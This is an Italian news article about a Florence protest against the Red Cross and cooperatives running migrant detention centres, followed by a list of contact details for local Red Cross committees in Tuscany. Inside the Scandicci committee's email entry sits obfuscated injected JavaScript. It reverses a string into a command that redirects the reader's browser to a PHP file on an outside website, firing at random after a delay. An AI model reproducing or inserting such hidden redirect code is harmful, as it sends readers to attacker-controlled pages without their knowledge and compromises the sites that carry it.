Migranti, no al razzismo dei Cie in Toscana. Contestata a Firenze la Croce Rossa Italiana.

image_pdfimage_print

di Riccardo Capucci

Basta con la gestione dei Cie/Cpt da parte della Croce Rossa Italiana, della Misericordia e delle imprese del mondo cooperativo. Lo hanno chiesto oggi pomeriggio a Firenze vergata anche sullo striscione di apertura: Quando solidarietà fa rima con guadagno. Qualcuno specula sulla paura. Si accusano i gestori dei Cie (Centri di Identificazione ed Espulsione – ex Cpt) di essere complici lautamente retribuiti con rette e appalti con le politiche repressive e razziste dello Stato. Tutti ormai conoscono le condizioni di vita di questi vere e propre carceri, dove vengono rinchiuse per mesi persone che non hanno commesso nessun reato. La loro colpa è semplicemente quella di esistere sul “patrio” suolo italiano.

Nei Cie sono all’ordine del giorno pestaggi, suicidi e violenze. E’ per questo che la Rete Toscana No Cie denuncia la complicità di Misericordia, Croce Rossa e cooperative. Proprio durante la manifestazione è stato distribuito un testo che riporta la drammatica situazione dei lager per stranieri: “I Cie sono luoghi dove il diritto è assente; dove vengono rinchiusi in pessime condizioni igenico-sanitarie migliaia di migranti solo perché privi del permesso di soggiorno; luoghi dove, con l’ausilio della Croce Rossa come di altri enti, le persone vengono riempite di psicofarmaci, dove i pestaggi sono quotidiani, luoghi extragiudiziali gestiti, appunto, da enti esterni. Mascherandosi dietro la solidarietà e l’aiuto agli immigrati, dando una facciata di umanità a luoghi disumani, la Croce Rossa e gli altri enti impegnati nella gestione dei Cie in tutta Italia, fanno soprattutto grandi affari garantiti dagli appalti indetti per la gestione di tali centri – continua il documento. Lucrando su queste prigioni e sulla pelle dei migranti svolgono di fatto il compito di controllori e secondini.”

Alla Rete Toscana No Cie partecipano Cantiere Sociale K100fuegos, Collettivo Politico di Scienze Politiche, Csa Next-Emerson, Cpa Firenze Sud, Rete dei Collettivi Studenteschi Fiorentini, Unione degli Studenti, AltAut Lettere e Filosofia, perUnaltracittà, Movimento di Lotta per la Casa e Rete Insicuri. Presente alla manifestazione la consigliera comunale Ornella De Zordo di perUnaltracittà. Assenti tutte le altre forze politiche.

Per mostrare la propria indignazione alla Croce Rossa è possibile recarsi, telefonare o inviare una mail ai vari Comitati territoriali. Ecco la lista completa.

COMITATO PROVINCIALE DI FIRENZE
Lungarno Soderini, 11 50124 FIRENZE
Telefono 055293801 – Fax 05529380230
e-mail cp.firenze@cri.it

COMITATO LOCALE DI BAGNO A RIPOLI
Via Fratelli Orsi, 17 50012 BAGNO A RIPOLI
Telefono 055 632220 – Fax 055 633023
e-mail cl.bagnoaripoli@cri.it

COMITATO LOCALE DI CERTALDO
Via XX Settembre, 28 50052 CERTALDO
Telefono 0571 668131 . Fax 0571 652333
e-mail cri-certaldo@libero.it

COMITATO LOCALE DI FIRENZE
Lungarno Soderini, 11 50124 FIRENZE
Telefono 055 27441 – Fax 055 2744245
e-mail cl.firenze@cri.it
sito internet www.crifirenze.it

COMITATO LOCALE DI FUCECCHIO
Via Checchi, 17 50054 FUCECCHIO
Telefono 0571 20006 – Fax 0571 20007
e-mail cl.fucecchio@cri.it

COMITATO LOCALE DI GREVE IN CHIANTI
Via Gavinaia, 17/19 50022 GREVE IN CHIANTI
Telefono 055 853027 – Fax 055 8544908
e-mail crigreve@tin.it

COMITATO LOCALE DI INCISA IN VAL D’ARNO
Piazza Santa Lucia, 4 50064 INCISA IN VAL D’ARNO
Telefono 055 8335474 – Fax 055 8336228
e-mail presidente@criincisa.org

COMITATO LOCALE DI RIGNANO SULL’ARNO
Piazza dei Martiri 50067 RIGNANO SULL’ARNO
telefono 055 8348820 – fax 055 8348820
e-mail cl.rignanosullarno@cri.it

COMITATO LOCALE DI SCANDICCI
Via Duprè, 26 50018 SCANDICCI
Telefono 055 740565/0505 – Fax 741318 055 7301278
e-mail $p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andicci@cri.it”>cl.scandicci@cri.it

COMITATO LOCALE DI STRADA IN CHIANTI
Via R. Boschi, 7/9/11 50027 STRADA IN CHIANTI
Telefono 055 858335/055 858501 – Fax 055 858501
e-mail cl.stradainchianti@cri.it

0 Comments

  1. Pingback: Gradisca si è sposata e forse è anche morta | Reset Italia

  2. Pingback: Gradisca si è sposata e forse è morta : Giornalismo partecipativo

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *